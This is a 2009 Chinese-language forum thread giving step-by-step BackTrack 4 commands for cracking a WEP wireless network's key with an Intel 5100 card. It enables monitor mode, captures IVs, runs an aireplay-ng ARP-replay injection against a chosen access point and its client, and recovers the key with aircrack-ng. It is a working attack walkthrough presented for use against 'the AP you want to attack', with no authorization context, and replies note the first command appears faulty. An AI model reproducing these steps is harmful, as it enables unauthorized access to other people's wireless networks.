Intel 5100 agn 用BT4进行有客户端-3攻击的具体步骤
本帖最后由 tinkle 于 2009-5-27 23:50 编辑对INTEL 5100AGN众说纷纷,其实还是动手做一下最实际。
1. 看看网卡,应该有一个wlan0的网卡,这就是INTEL 5100
ifconfig-ng -a
2.开始监听模式,
airmon-ng start wlan0 6
增加监听端口mon0,在这里要留意最后的6是要监听信道6,如果在运行第二次会出现mon1以此类推,可以监听不同的信道,也就是说万一弄错了就再开一个
3. 开始抓包
airodump-ng --ivs -w 1 -c 6 mon0
-c 后面的6是信道,要跟mon0监听的信道一致,认真看看你要攻击的AP有没有可用的客户端,有的话就可以进行下一步了,没有的话就不是有客户端的攻击了 ^_^
4. -3 攻击
aireplay-ng -3 -b 00:19:E0:AF:00:00 -h 00:19:D2:19:11:11 mon0
-b后面是AP的MAC, -h 后面的是该AP的客户端的MAC, mon0要跟监听端口一致
5. 剩下就是等DATA 足够多了。其实一直开着下面的命令等他自己算出来也行,到数量会自动再算一次的,算出来为止。
aircrack-ng -n 128 *.ivs
这里要选一下我们要计算的ESSID。
下面是我截的屏幕,作为可以-3的证据,留意 #/s可以超过300。在没开始-3之前是0或1,不超过10
dddddddddddddddd 好帖 顶~~ 4# capkz
意思是wlan0就是无线网卡,不是说wlan0就一定是5100 第一步ifconfig-ng -a貌似找不到网卡啊...
页:
[1]